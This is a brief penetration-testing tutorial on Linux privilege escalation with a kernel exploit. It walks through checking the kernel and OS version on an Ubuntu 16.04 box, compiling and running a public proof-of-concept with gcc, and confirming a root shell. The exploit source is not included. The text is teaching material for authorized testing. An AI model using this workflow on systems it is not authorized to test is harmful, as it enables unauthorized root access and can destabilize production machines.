Kernel Exploits

Privilege escalation using a kernel exploit can be as simple as downloading, compiling, and running it. Some of these exploits work out of the box, while others require modification.

Note: Kernel exploits can cause system instability so use caution when running these against a production system.

Start by checking the Kernel level and Linux OS version.

neutron@kali[/kali]$ uname -a

Linux NIX02 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

neutron@kali[/kali]$ cat /etc/lsb-release 

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"

We can see that we are on Linux Kernel 4.4.0-116 on an Ubuntu 16.04.4 LTS box. A quick Google search for linux 4.4.0-116-generic exploit comes up with this exploit PoC. Next download, it to the system using wget or another file transfer method. We can compile the exploit code using gcc and set the executable bit using chmod +x.

neutron@kali[/kali]$ gcc kernel_expoit.c -o kernel_expoit && chmod +x kernel_expoit

Run the exploit and hopefully get dropped into a root shell.

neutron@kali[/kali]$ ./kernel_expoit 

task_struct = ffff8800b71d7000
uidptr = ffff8800b95ce544
spawning root shell

Confirm root access to the box.

root@xyz[/xyz]# whoami

root